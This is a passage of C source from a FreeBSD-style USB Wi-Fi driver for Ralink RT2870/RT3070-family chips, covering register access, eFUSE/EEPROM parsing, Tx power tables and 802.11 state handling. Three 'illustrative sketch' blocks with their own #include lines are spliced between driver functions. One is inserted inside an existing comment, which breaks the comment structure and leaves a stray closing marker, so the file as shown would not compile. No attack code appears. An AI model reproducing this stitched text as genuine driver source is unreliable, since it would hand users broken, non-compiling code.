*sc, uint16_t reg, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RT2870_READ_REGION_1; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, len); return (run_do_request(sc, &req, buf)); } static int run_write_2(struct run_softc *sc, uint16_t reg, uint16_t val) { usb_device_request_t req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2870_WRITE_2; USETW(req.wValue, val); USETW(req.wIndex, reg); USETW(req.wLength, 0); return (run_do_request(sc, &req, NULL)); } static int run_write(struct run_softc *sc, uint16_t reg, uint32_t val) { int error; if ((error = run_write_2(sc, reg, val & 0xffff)) == 0) error = run_write_2(sc, reg + 2, val >> 16); return (error); } static int run_write_region_1(struct run_softc *sc, uint16_t reg, const uint8_t *buf, int len) { #if 1 int i, error = 0; /* * NB: the WRITE_REGION_1 command is not stable on RT2860. * We thus issue multiple WRITE_2 commands instead. */ KASSERT((len & 1) == 0, ("run_write_region_1: Data too long.\n")); for (i = 0; i < len && error == 0; i += 2) error = run_write_2(sc, reg + i, buf[i] | buf[i + 1] << 8); return (error); #else usb_device_request_t req; int error = 0; /* * NOTE: It appears the WRITE_REGION_1 command cannot be * passed a huge amount of data, which will crash the * firmware. Limit amount of data passed to 64-bytes at a * time. 
*/ while (len > 0) { int delta = 64; if (delta > len) delta = len; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2870_WRITE_REGION_1; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, delta); error = run_do_request(sc, &req, __DECONST(uint8_t *, buf)); if (error != 0) break; reg += delta; buf += delta; len -= delta; } return (error); #endif } static int run_set_region_4(struct run_softc *sc, uint16_t reg, uint32_t val, int len) { int i, error = 0; KASSERT((len & 3) == 0, ("run_set_region_4: Invalid data length.\n")); for (i = 0; i < len && error == 0; i += 4) error = run_write(sc, reg + i, val); return (error); } static int run_rf3593_efuse_read_1(struct run_softc *sc, uint16_t addr, uint16_t *val) { return (run_efuse_read(sc, addr * 2, val, 1)); } static int run_efuse_read(struct run_softc *sc, uint16_t addr, uint16_t *val, int count) { uint32_t tmp; uint16_t reg; int error, ntries; if ((error = run_read(sc, RT3070_EFUSE_CTRL, &tmp)) != 0) return (error); if (count == 2) addr *= 2; /*- * Read one 16-byte block into registers EFUSE_DATA[0-3]: * DATA0: F E D C * DATA1: B A 9 8 * DATA2: 7 6 5 4 * DATA3: 3 2 1 0 */ tmp &= ~(RT3070_EFSROM_MODE_MASK | RT3070_EFSROM_AIN_MASK); tmp |= (addr & ~0xf) << RT3070_EFSROM_AIN_SHIFT | RT3070_EFSROM_KICK; run_write(sc, RT3070_EFUSE_CTRL, tmp); for (ntries = 0; ntries < 100; ntries++) { if ((error = run_read(sc, RT3070_EFUSE_CTRL, &tmp)) != 0) return (error); if (!(tmp & RT3070_EFSROM_KICK)) break; run_delay(sc, 2); } if (ntries == 100) return (ETIMEDOUT); if ((tmp & RT3070_EFUSE_AOUT_MASK) == RT3070_EFUSE_AOUT_MASK) { *val = 0xffff; /* address not found */ return (0); } /* determine to which 32-bit register our 16-bit word belongs */ reg = RT3070_EFUSE_DATA3 - (addr & 0xc); if ((error = run_read(sc, reg, &tmp)) != 0) return (error); if (count == 2) *val = (addr & 2) ? tmp >> 16 : tmp & 0xffff; else { tmp >>= (8 *(addr & 0x3)); memmove(val, &tmp, sizeof(*val)); } return (0); } /* Read 16-bit from eFUSE ROM (RT3070 only.) 
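/*
 * Illustrative sketch of the eFUSE addressing used by run_efuse_read()
 * above: a read always fetches the 16-byte block containing `addr' into
 * EFUSE_DATA0..EFUSE_DATA3 (laid out as in that function's comment), and
 * the wanted 16-bit word is then picked out of one 32-bit register.
 */
#include <stdint.h>

struct efuse_slot {
        int     data_idx;       /* 0..3, index into EFUSE_DATA[] */
        int     high_half;      /* nonzero: take bits 31..16 */
};

static struct efuse_slot
efuse_locate(uint16_t addr)             /* byte address within the eFUSE */
{
        struct efuse_slot s;

        s.data_idx  = 3 - ((addr & 0xc) >> 2);  /* DATA3 holds bytes 3..0 */
        s.high_half = (addr & 2) != 0;
        return s;
}
/*
 * e.g. addr 0x16 -> block 0x10; bytes 7..4 of that block sit in DATA2, and
 * the 16-bit word at 0x16 is the high half of DATA2.
 */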
*/ static int run_efuse_read_2(struct run_softc *sc, uint16_t addr, uint16_t *val) { return (run_efuse_read(sc, addr, val, 2)); } static int run_eeprom_read_2(struct run_softc *sc, uint16_t addr, uint16_t *val) { usb_device_request_t req; uint16_t tmp; int error; addr *= 2; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RT2870_EEPROM_READ; USETW(req.wValue, 0); USETW(req.wIndex, addr); USETW(req.wLength, sizeof(tmp)); error = usbd_do_request(sc->sc_udev, &sc->sc_mtx, &req, &tmp); if (error == 0) *val = le16toh(tmp); else *val = 0xffff; return (error); } static __inline int run_srom_read(struct run_softc *sc, uint16_t addr, uint16_t *val) { /* either eFUSE ROM or EEPROM */ return sc->sc_srom_read(sc, addr, val); } static int run_rt2870_rf_write(struct run_softc *sc, uint32_t val) { uint32_t tmp; int error, ntries; for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT2860_RF_CSR_CFG0, &tmp)) != 0) return (error); if (!(tmp & RT2860_RF_REG_CTRL)) break; } if (ntries == 10) return (ETIMEDOUT); return (run_write(sc, RT2860_RF_CSR_CFG0, val)); } static int run_rt3070_rf_read(struct run_softc *sc, uint8_t reg, uint8_t *val) { uint32_t tmp; int error, ntries; for (ntries = 0; ntries < 100; ntries++) { if ((error = run_read(sc, RT3070_RF_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT3070_RF_KICK)) break; } if (ntries == 100) return (ETIMEDOUT); tmp = RT3070_RF_KICK | reg << 8; if ((error = run_write(sc, RT3070_RF_CSR_CFG, tmp)) != 0) return (error); for (ntries = 0; ntries < 100; ntries++) { if ((error = run_read(sc, RT3070_RF_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT3070_RF_KICK)) break; } if (ntries == 100) return (ETIMEDOUT); *val = tmp & 0xff; return (0); } static int run_rt3070_rf_write(struct run_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int error, ntries; for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT3070_RF_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT3070_RF_KICK)) break; } if (ntries == 10) return (ETIMEDOUT); tmp = RT3070_RF_WRITE | RT3070_RF_KICK | reg << 8 | val; return (run_write(sc, RT3070_RF_CSR_CFG, tmp)); } static int run_bbp_read(struct run_softc *sc, uint8_t reg, uint8_t *val) { uint32_t tmp; int ntries, error; for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT2860_BBP_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT2860_BBP_CSR_KICK)) break; } if (ntries == 10) return (ETIMEDOUT); tmp = RT2860_BBP_CSR_READ | RT2860_BBP_CSR_KICK | reg << 8; if ((error = run_write(sc, RT2860_BBP_CSR_CFG, tmp)) != 0) return (error); for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT2860_BBP_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT2860_BBP_CSR_KICK)) break; } if (ntries == 10) return (ETIMEDOUT); *val = tmp & 0xff; return (0); } static int run_bbp_write(struct run_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries, error; for (ntries = 0; ntries < 10; ntries++) { if ((error = run_read(sc, RT2860_BBP_CSR_CFG, &tmp)) != 0) return (error); if (!(tmp & RT2860_BBP_CSR_KICK)) break; } if (ntries == 10) return (ETIMEDOUT); tmp = RT2860_BBP_CSR_KICK | reg << 8 | val; return (run_write(sc, RT2860_BBP_CSR_CFG, tmp)); } /* * Send a command to the 8051 microcontroller unit. 
*/ static int run_mcu_cmd(struct run_softc *sc, uint8_t cmd, uint16_t arg) { uint32_t tmp; int error, ntries; for (ntries = 0; ntries < 100; ntries++) { if ((error = run_read(sc, RT2860_H2M_MAILBOX, &tmp)) != 0) return error; if (!(tmp & RT2860_H2M_BUSY)) break; } if (ntries == 100) return ETIMEDOUT; tmp = RT2860_H2M_BUSY | RT2860_TOKEN_NO_INTR << 16 | arg; if ((error = run_write(sc, RT2860_H2M_MAILBOX, tmp)) == 0) error = run_write(sc, RT2860_HOST_CMD, cmd); return (error); } /* * Add `delta' (signed) to each 4-bit sub-word of a 32-bit word. * Used to adjust per-rate Tx power registers. */ static __inline uint32_t b4inc(uint32_t b32, int8_t delta) { int8_t i, b4; for (i = 0; i < 8; i++) { b4 = b32 & 0xf; b4 += delta; if (b4 < 0) b4 = 0; else if (b4 > 0xf) b4 = 0xf; b32 = b32 >> 4 | b4 << 28; } return (b32); } static const char * run_get_rf(uint16_t rev) { switch (rev) { case RT2860_RF_2820: return "RT2820"; case RT2860_RF_2850: return "RT2850"; case RT2860_RF_2720: return "RT2720"; case RT2860_RF_2750: return "RT2750"; case RT3070_RF_3020: return "RT3020"; case RT3070_RF_2020: return "RT2020"; case RT3070_RF_3021: return "RT3021"; case RT3070_RF_3022: return "RT3022"; case RT3070_RF_3052: return "RT3052"; case RT3593_RF_3053: return "RT3053"; case RT5592_RF_5592: return "RT5592"; case RT5390_RF_5370: return "RT5370"; case RT5390_RF_5372: return "RT5372"; } return ("unknown"); } static void run_rt3593_get_txpower(struct run_softc *sc) { uint16_t addr, val; int i; /* Read power settings for 2GHz channels. */ for (i = 0; i < 14; i += 2) { addr = (sc->ntxchains == 3) ? RT3593_EEPROM_PWR2GHZ_BASE1 : RT2860_EEPROM_PWR2GHZ_BASE1; run_srom_read(sc, addr + i / 2, &val); sc->txpow1[i + 0] = (int8_t)(val & 0xff); sc->txpow1[i + 1] = (int8_t)(val >> 8); addr = (sc->ntxchains == 3) ? RT3593_EEPROM_PWR2GHZ_BASE2 : RT2860_EEPROM_PWR2GHZ_BASE2; run_srom_read(sc, addr + i / 2, &val); sc->txpow2[i + 0] = (int8_t)(val & 0xff); sc->txpow2[i + 1] = (int8_t)(val >> 8); if (sc->ntxchains == 3) { run_srom_read(sc, RT3593_EEPROM_PWR2GHZ_BASE3 + i / 2, &val); sc->txpow3[i + 0] = (int8_t)(val & 0xff); sc->txpow3[i + 1] = (int8_t)(val >> 8); } } /* Fix broken Tx power entries. */ for (i = 0; i < 14; i++) { if ((sc->txpow1[i] & 0x1f) > 31) sc->txpow1[i] = 5; if ((sc->txpow2[i] & 0x1f) > 31) sc->txpow2[i] = 5; if (sc->ntxchains == 3) { if ((sc->txpow3[i] & 0x1f) > 31) sc->txpow3[i] = 5; } } /* Read power settings for 5GHz channels. */ for (i = 0; i < 40; i += 2) { run_srom_read(sc, RT3593_EEPROM_PWR5GHZ_BASE1 + i / 2, &val); sc->txpow1[i + 14] = (int8_t)(val & 0xff); sc->txpow1[i + 15] = (int8_t)(val >> 8); run_srom_read(sc, RT3593_EEPROM_PWR5GHZ_BASE2 + i / 2, &val); sc->txpow2[i + 14] = (int8_t)(val & 0xff); sc->txpow2[i + 15] = (int8_t)(val >> 8); if (sc->ntxchains == 3) { run_srom_read(sc, RT3593_EEPROM_PWR5GHZ_BASE3 + i / 2, &val); sc->txpow3[i + 14] = (int8_t)(val & 0xff); sc->txpow3[i + 15] = (int8_t)(val >> 8); } } } static void run_get_txpower(struct run_softc *sc) { uint16_t val; int i; /* Read power settings for 2GHz channels. */ for (i = 0; i < 14; i += 2) { run_srom_read(sc, RT2860_EEPROM_PWR2GHZ_BASE1 + i / 2, &val); sc->txpow1[i + 0] = (int8_t)(val & 0xff); sc->txpow1[i + 1] = (int8_t)(val >> 8); if (sc->mac_ver != 0x5390) { run_srom_read(sc, RT2860_EEPROM_PWR2GHZ_BASE2 + i / 2, &val); sc->txpow2[i + 0] = (int8_t)(val & 0xff); sc->txpow2[i + 1] = (int8_t)(val >> 8); } } /* Fix broken Tx power entries. 
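/*
 * Illustrative sketch of b4inc() above: the delta is added to each of the
 * eight 4-bit sub-words with saturation at 0x0 and 0xf, e.g.
 * b4inc(0x24682468, 3) == 0x579b579b and b4inc(0xf0f0f0f0, 3) == 0xf3f3f3f3.
 */
#include <stdint.h>

static uint32_t
nibble_sat_add(uint32_t w, int8_t delta)        /* mirrors b4inc() */
{
        uint32_t out = 0;
        int i, n;

        for (i = 0; i < 8; i++) {
                n = (int)((w >> (4 * i)) & 0xf) + delta;
                if (n < 0)
                        n = 0;
                else if (n > 0xf)
                        n = 0xf;
                out |= (uint32_t)n << (4 * i);
        }
        return out;
}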
*/ for (i = 0; i < 14; i++) { if (sc->mac_ver >= 0x5390) { if (sc->txpow1[i] < 0 || sc->txpow1[i] > 27) sc->txpow1[i] = 5; } else { if (sc->txpow1[i] < 0 || sc->txpow1[i] > 31) sc->txpow1[i] = 5; } if (sc->mac_ver > 0x5390) { if (sc->txpow2[i] < 0 || sc->txpow2[i] > 27) sc->txpow2[i] = 5; } else if (sc->mac_ver < 0x5390) { if (sc->txpow2[i] < 0 || sc->txpow2[i] > 31) sc->txpow2[i] = 5; } DPRINTF("chan %d: power1=%d, power2=%d\n", rt2860_rf2850[i].chan, sc->txpow1[i], sc->txpow2[i]); } /* Read power settings for 5GHz channels. */ for (i = 0; i < 40; i += 2) { run_srom_read(sc, RT2860_EEPROM_PWR5GHZ_BASE1 + i / 2, &val); sc->txpow1[i + 14] = (int8_t)(val & 0xff); sc->txpow1[i + 15] = (int8_t)(val >> 8); run_srom_read(sc, RT2860_EEPROM_PWR5GHZ_BASE2 + i / 2, &val); sc->txpow2[i + 14] = (int8_t)(val & 0xff); sc->txpow2[i + 15] = (int8_t)(val >> 8); } /* Fix broken Tx power entries. */ for (i = 0; i < 40; i++ ) { if (sc->mac_ver != 0x5592) { if (sc->txpow1[14 + i] < -7 || sc->txpow1[14 + i] > 15) sc->txpow1[14 + i] = 5; if (sc->txpow2[14 + i] < -7 || sc->txpow2[14 + i] > 15) sc->txpow2[14 + i] = 5; } DPRINTF("chan %d: power1=%d, power2=%d\n", rt2860_rf2850[14 + i].chan, sc->txpow1[14 + i], sc->txpow2[14 + i]); } } static int run_read_eeprom(struct run_softc *sc) { int8_t delta_2ghz, delta_5ghz; uint32_t tmp; uint16_t val; int ridx, ant, i; /* check whether the ROM is eFUSE ROM or EEPROM */ sc->sc_srom_read = run_eeprom_read_2; if (sc->mac_ver >= 0x3070) { run_read(sc, RT3070_EFUSE_CTRL, &tmp); DPRINTF("EFUSE_CTRL=0x%08x\n", tmp); if ((tmp & RT3070_SEL_EFUSE) && sc->mac_ver != 0x3593) sc->sc_srom_read = run_efuse_read_2; else sc->sc_srom_read = run_rf3593_efuse_read_1; } /* read ROM version */ run_srom_read(sc, RT2860_EEPROM_VERSION, &val); DPRINTF("EEPROM rev=%d, FAE=%d\n", val & 0xff, val >> 8); /* read MAC address */ run_srom_read(sc, RT2860_EEPROM_MAC01, &val); sc->sc_bssid[0] = val & 0xff; sc->sc_bssid[1] = val >> 8; run_srom_read(sc, RT2860_EEPROM_MAC23, &val); sc->sc_bssid[2] = val & 0xff; sc->sc_bssid[3] = val >> 8; run_srom_read(sc, RT2860_EEPROM_MAC45, &val); sc->sc_bssid[4] = val & 0xff; sc->sc_bssid[5] = val >> 8; if (sc->mac_ver < 0x3593) { /* read vender BBP settings */ for (i = 0; i < 10; i++) { run_srom_read(sc, RT2860_EEPROM_BBP_BASE + i, &val); sc->bbp[i].val = val & 0xff; sc->bbp[i].reg = val >> 8; DPRINTF("BBP%d=0x%02x\n", sc->bbp[i].reg, sc->bbp[i].val); } if (sc->mac_ver >= 0x3071) { /* read vendor RF settings */ for (i = 0; i < 10; i++) { run_srom_read(sc, RT3071_EEPROM_RF_BASE + i, &val); sc->rf[i].val = val & 0xff; sc->rf[i].reg = val >> 8; DPRINTF("RF%d=0x%02x\n", sc->rf[i].reg, sc->rf[i].val); } } } /* read RF frequency offset from EEPROM */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_FREQ_LEDS : RT3593_EEPROM_FREQ, &val); sc->freq = ((val & 0xff) != 0xff) ? val & 0xff : 0; DPRINTF("EEPROM freq offset %d\n", sc->freq & 0xff); run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_FREQ_LEDS : RT3593_EEPROM_FREQ_LEDS, &val); if (val >> 8 != 0xff) { /* read LEDs operating mode */ sc->leds = val >> 8; run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_LED1 : RT3593_EEPROM_LED1, &sc->led[0]); run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_LED2 : RT3593_EEPROM_LED2, &sc->led[1]); run_srom_read(sc, (sc->mac_ver != 0x3593) ? 
RT2860_EEPROM_LED3 : RT3593_EEPROM_LED3, &sc->led[2]); } else { /* broken EEPROM, use default settings */ sc->leds = 0x01; sc->led[0] = 0x5555; sc->led[1] = 0x2221; sc->led[2] = 0x5627; /* differs from RT2860 */ } DPRINTF("EEPROM LED mode=0x%02x, LEDs=0x%04x/0x%04x/0x%04x\n", sc->leds, sc->led[0], sc->led[1], sc->led[2]); /* read RF information */ if (sc->mac_ver == 0x5390 || sc->mac_ver ==0x5392) run_srom_read(sc, 0x00, &val); else run_srom_read(sc, RT2860_EEPROM_ANTENNA, &val); if (val == 0xffff) { device_printf(sc->sc_dev, "invalid EEPROM antenna info, using default\n"); DPRINTF("invalid EEPROM antenna info, using default\n"); if (sc->mac_ver == 0x3572) { /* default to RF3052 2T2R */ sc->rf_rev = RT3070_RF_3052; sc->ntxchains = 2; sc->nrxchains = 2; } else if (sc->mac_ver >= 0x3070) { /* default to RF3020 1T1R */ sc->rf_rev = RT3070_RF_3020; sc->ntxchains = 1; sc->nrxchains = 1; } else { /* default to RF2820 1T2R */ sc->rf_rev = RT2860_RF_2820; sc->ntxchains = 1; sc->nrxchains = 2; } } else { if (sc->mac_ver == 0x5390 || sc->mac_ver ==0x5392) { sc->rf_rev = val; run_srom_read(sc, RT2860_EEPROM_ANTENNA, &val); } else sc->rf_rev = (val >> 8) & 0xf; sc->ntxchains = (val >> 4) & 0xf; sc->nrxchains = val & 0xf; } DPRINTF("EEPROM RF rev=0x%04x chains=%dT%dR\n", sc->rf_rev, sc->ntxchains, sc->nrxchains); /* check if RF supports automatic Tx access gain control */ run_srom_read(sc, RT2860_EEPROM_CONFIG, &val); DPRINTF("EEPROM CFG 0x%04x\n", val); /* check if driver should patch the DAC issue */ if ((val >> 8) != 0xff) sc->patch_dac = (val >> 15) & 1; if ((val & 0xff) != 0xff) { sc->ext_5ghz_lna = (val >> 3) & 1; sc->ext_2ghz_lna = (val >> 2) & 1; /* check if RF supports automatic Tx access gain control */ sc->calib_2ghz = sc->calib_5ghz = (val >> 1) & 1; /* check if we have a hardware radio switch */ sc->rfswitch = val & 1; } /* Read Tx power settings. */ if (sc->mac_ver == 0x3593) run_rt3593_get_txpower(sc); else run_get_txpower(sc); /* read Tx power compensation for each Tx rate */ run_srom_read(sc, RT2860_EEPROM_DELTAPWR, &val); delta_2ghz = delta_5ghz = 0; if ((val & 0xff) != 0xff && (val & 0x80)) { delta_2ghz = val & 0xf; if (!(val & 0x40)) /* negative number */ delta_2ghz = -delta_2ghz; } val >>= 8; if ((val & 0xff) != 0xff && (val & 0x80)) { delta_5ghz = val & 0xf; if (!(val & 0x40)) /* negative number */ delta_5ghz = -delta_5ghz; } DPRINTF("power compensation=%d (2GHz), %d (5GHz)\n", delta_2ghz, delta_5ghz); for (ridx = 0; ridx < 5; ridx++) { uint32_t reg; run_srom_read(sc, RT2860_EEPROM_RPWR + ridx * 2, &val); reg = val; run_srom_read(sc, RT2860_EEPROM_RPWR + ridx * 2 + 1, &val); reg |= (uint32_t)val << 16; sc->txpow20mhz[ridx] = reg; sc->txpow40mhz_2ghz[ridx] = b4inc(reg, delta_2ghz); sc->txpow40mhz_5ghz[ridx] = b4inc(reg, delta_5ghz); DPRINTF("ridx %d: power 20MHz=0x%08x, 40MHz/2GHz=0x%08x, " "40MHz/5GHz=0x%08x\n", ridx, sc->txpow20mhz[ridx], sc->txpow40mhz_2ghz[ridx], sc->txpow40mhz_5ghz[ridx]); } /* Read RSSI offsets and LNA gains from EEPROM. */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_RSSI1_2GHZ : RT3593_EEPROM_RSSI1_2GHZ, &val); sc->rssi_2ghz[0] = val & 0xff; /* Ant A */ sc->rssi_2ghz[1] = val >> 8; /* Ant B */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_RSSI2_2GHZ : RT3593_EEPROM_RSSI2_2GHZ, &val); if (sc->mac_ver >= 0x3070) { if (sc->mac_ver == 0x3593) { sc->txmixgain_2ghz = 0; sc->rssi_2ghz[2] = val & 0xff; /* Ant C */ } else { /* * On RT3070 chips (limited to 2 Rx chains), this ROM * field contains the Tx mixer gain for the 2GHz band. 
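/*
 * Illustrative sketch of the RT2860_EEPROM_DELTAPWR decoding above: each
 * band gets one byte where 0xff means "not programmed", bit 7 enables the
 * correction, bit 6 selects the sign (clear = negative) and the low nibble
 * is the magnitude; the decoded delta then feeds b4inc() to derive the
 * 40MHz Tx power words from the 20MHz ones.
 */
#include <stdint.h>

static int8_t
decode_delta_pwr(uint8_t b)
{
        int8_t delta;

        if (b == 0xff || (b & 0x80) == 0)
                return 0;               /* unprogrammed or disabled */
        delta = b & 0xf;
        if ((b & 0x40) == 0)            /* sign bit clear: negative */
                delta = -delta;
        return delta;
}
/* e.g. 0x84 -> -4, 0xc4 -> +4, 0xff or 0x04 -> 0 */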
*/ if ((val & 0xff) != 0xff) sc->txmixgain_2ghz = val & 0x7; } DPRINTF("tx mixer gain=%u (2GHz)\n", sc->txmixgain_2ghz); } else sc->rssi_2ghz[2] = val & 0xff; /* Ant C */ if (sc->mac_ver == 0x3593) run_srom_read(sc, RT3593_EEPROM_LNA_5GHZ, &val); sc->lna[2] = val >> 8; /* channel group 2 */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_RSSI1_5GHZ : RT3593_EEPROM_RSSI1_5GHZ, &val); sc->rssi_5ghz[0] = val & 0xff; /* Ant A */ sc->rssi_5ghz[1] = val >> 8; /* Ant B */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_RSSI2_5GHZ : RT3593_EEPROM_RSSI2_5GHZ, &val); if (sc->mac_ver == 0x3572) { /* * On RT3572 chips (limited to 2 Rx chains), this ROM * field contains the Tx mixer gain for the 5GHz band. */ if ((val & 0xff) != 0xff) sc->txmixgain_5ghz = val & 0x7; DPRINTF("tx mixer gain=%u (5GHz)\n", sc->txmixgain_5ghz); } else sc->rssi_5ghz[2] = val & 0xff; /* Ant C */ if (sc->mac_ver == 0x3593) { sc->txmixgain_5ghz = 0; run_srom_read(sc, RT3593_EEPROM_LNA_5GHZ, &val); } sc->lna[3] = val >> 8; /* channel group 3 */ run_srom_read(sc, (sc->mac_ver != 0x3593) ? RT2860_EEPROM_LNA : RT3593_EEPROM_LNA, &val); sc->lna[0] = val & 0xff; /* channel group 0 */ sc->lna[1] = val >> 8; /* channel group 1 */ /* fix broken 5GHz LNA entries */ if (sc->lna[2] == 0 || sc->lna[2] == 0xff) { DPRINTF("invalid LNA for channel group %d\n", 2); sc->lna[2] = sc->lna[1]; } if (sc->lna[3] == 0 || sc->lna[3] == 0xff) { DPRINTF("invalid LNA for channel group %d\n", 3); sc->lna[3] = sc->lna[1]; } /* fix broken RSSI offset entries */ for (ant = 0; ant < 3; ant++) { if (sc->rssi_2ghz[ant] < -10 || sc->rssi_2ghz[ant] > 10) { DPRINTF("invalid RSSI%d offset: %d (2GHz)\n", ant + 1, sc->rssi_2ghz[ant]); sc->rssi_2ghz[ant] = 0; } if (sc->rssi_5ghz[ant] < -10 || sc->rssi_5ghz[ant] > 10) { DPRINTF("invalid RSSI%d offset: %d (5GHz)\n", ant + 1, sc->rssi_5ghz[ant]); sc->rssi_5ghz[ant] = 0; } } return (0); } static struct ieee80211_node * run_node_alloc(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { return malloc(sizeof (struct run_node), M_DEVBUF, M_NOWAIT | M_ZERO); } static int run_media_change(struct ifnet *ifp) { struct ieee80211vap *vap = ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; const struct ieee80211_txparam *tp; struct run_softc *sc = ic->ic_ifp->if_softc; uint8_t rate, ridx; int error; RUN_LOCK(sc); error = ieee80211_media_change(ifp); if (error != ENETRESET) { RUN_UNLOCK(sc); return (error); } tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { struct ieee80211_node *ni; struct run_node *rn; rate = ic->ic_sup_rates[ic->ic_curmode]. 
rs_rates[tp->ucastrate] & IEEE80211_RATE_VAL; for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == rate) break; ni = ieee80211_ref_node(vap->iv_bss); rn = (struct run_node *)ni; rn->fix_ridx = ridx; DPRINTF("rate=%d, fix_ridx=%d\n", rate, rn->fix_ridx); ieee80211_free_node(ni); } #if 0 if ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING)){ run_init_locked(sc); } #endif RUN_UNLOCK(sc); return (0); } static int run_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { const struct ieee80211_txparam *tp; struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct run_vap *rvp = RUN_VAP(vap); enum ieee80211_state ostate; uint32_t sta[3]; uint32_t tmp; uint8_t ratectl; uint8_t restart_ratectl = 0; uint8_t bid = 1 << rvp->rvp_id; ostate = vap->iv_state; DPRINTF("%s -> %s\n", ieee80211_state_name[ostate], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); RUN_LOCK(sc); ratectl = sc->ratectl_run; /* remember current state */ sc->ratectl_run = RUN_RATECTL_OFF; usb_callout_stop(&sc->ratectl_ch); if (ostate == IEEE80211_S_RUN) { /* turn link LED off */ run_set_leds(sc, RT2860_LED_RADIO); } switch (nstate) { case IEEE80211_S_INIT: restart_ratectl = 1; if (ostate != IEEE80211_S_RUN) break; ratectl &= ~bid; sc->runbmap &= ~bid; /* abort TSF synchronization if there is no vap running */ if (--sc->running == 0) { run_read(sc, RT2860_BCN_TIME_CFG, &tmp); run_write(sc, RT2860_BCN_TIME_CFG, tmp & ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN)); } break; case IEEE80211_S_RUN: if (!(sc->runbmap & bid)) { if(sc->running++) restart_ratectl = 1; sc->runbmap |= bid; } m_freem(rvp->beacon_mbuf); rvp->beacon_mbuf = NULL; switch (vap->iv_opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: sc->ap_running |= bid; ic->ic_opmode = vap->iv_opmode; run_update_beacon_cb(vap); break; case IEEE80211_M_IBSS: sc->adhoc_running |= bid; if (!sc->ap_running) ic->ic_opmode = vap->iv_opmode; run_update_beacon_cb(vap); break; case IEEE80211_M_STA: sc->sta_running |= bid; if (!sc->ap_running && !sc->adhoc_running) ic->ic_opmode = vap->iv_opmode; /* read statistic counters (clear on read) */ run_read_region_1(sc, RT2860_TX_STA_CNT0, (uint8_t *)sta, sizeof sta); break; default: ic->ic_opmode = vap->iv_opmode; break; } if (vap->iv_opmode != IEEE80211_M_MONITOR) { struct ieee80211_node *ni; if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) { RUN_UNLOCK(sc); IEEE80211_LOCK(ic); return (-1); } run_updateslot(ic->ic_ifp); run_enable_mrr(sc); run_set_txpreamble(sc); run_set_basicrates(sc); ni = ieee80211_ref_node(vap->iv_bss); IEEE80211_ADDR_COPY(sc->sc_bssid, ni->ni_bssid); run_set_bssid(sc, ni->ni_bssid); ieee80211_free_node(ni); run_enable_tsf_sync(sc); /* enable automatic rate adaptation */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) ratectl |= bid; } /* turn link LED on */ run_set_leds(sc, RT2860_LED_RADIO | (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan) ? 
RT2860_LED_LINK_2GHZ : RT2860_LED_LINK_5GHZ)); break; default: DPRINTFN(6, "undefined case\n"); break; } /* restart amrr for running VAPs */ if ((sc->ratectl_run = ratectl) && restart_ratectl) usb_callout_reset(&sc->ratectl_ch, hz, run_ratectl_to, sc); RUN_UNLOCK(sc); IEEE80211_LOCK(ic); return(rvp->newstate(vap, nstate, arg)); } /* ARGSUSED */ static void run_wme_update_cb(void *arg) { struct ieee80211com *ic = arg; struct run_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_wme_state *wmesp = &ic->ic_wme; int aci, error = 0; RUN_LOCK_ASSERT(sc, MA_OWNED); /* update MAC TX configuration registers */ for (aci = 0; aci < WME_NUM_AC; aci++) { error = run_write(sc, RT2860_EDCA_AC_CFG(aci), wmesp->wme_params[aci].wmep_logcwmax << 16 | wmesp->wme_params[aci].wmep_logcwmin << 12 | wmesp->wme_params[aci].wmep_aifsn << 8 | wmesp->wme_params[aci].wmep_txopLimit); if (error) goto err; } /* update SCH/DMA registers too */ error = run_write(sc, RT2860_WMM_AIFSN_CFG, wmesp->wme_params[WME_AC_VO].wmep_aifsn << 12 | wmesp->wme_params[WME_AC_VI].wmep_aifsn << 8 | wmesp->wme_params[WME_AC_BK].wmep_aifsn << 4 | 